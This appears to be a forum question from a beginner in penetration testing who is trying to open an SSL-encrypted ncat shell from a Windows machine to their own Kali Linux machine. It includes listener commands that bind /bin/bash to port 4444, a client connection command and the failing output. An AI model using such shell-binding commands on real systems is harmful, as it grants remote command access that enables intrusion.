Trying to create a reverse bind shell from Windows to Linux

I’m trying to create an encrypted reverse bind shell from my Windows machine to my Linux machine. Being totally new to penetration testing, I’m having a little bit of trouble.

First, on my Linux (Kali) machine, I setup a listener on port 4444:

ncat -nlvp 4444 -e /bin/bash --ssl

I’ve been researching a lot and found out I may need to make it interactive, so I tried adding:

ncat -nlvp 4444 -e '/bin/bash -i' --ssl

Now, on my Windows box, I connect to it and try to access the terminal for my Linux machine by typing in the following command:

ncat -v windowsIPAddress 4444 --ssl

Now, my Linux box has no problem listening, but the output on my Windows box only shows:

C:\Windows\ncat> ncat -v linuxBoxIP 4444 --ssl
Ncat: Version 5.59BETA1 ( http://nmap.org/ncat )
Ncat: .
C:\Windows\ncat>

So, I have no idea why it only shows a”.” and doesn’t connect to the Linux command prompt. I’ve been researching for a long time, and it appears that I’m doing everything correctly, but I’m obviously not.

Does anyone have any insight on this issue?

Continue reading Trying to create a reverse bind shell from Windows to Linux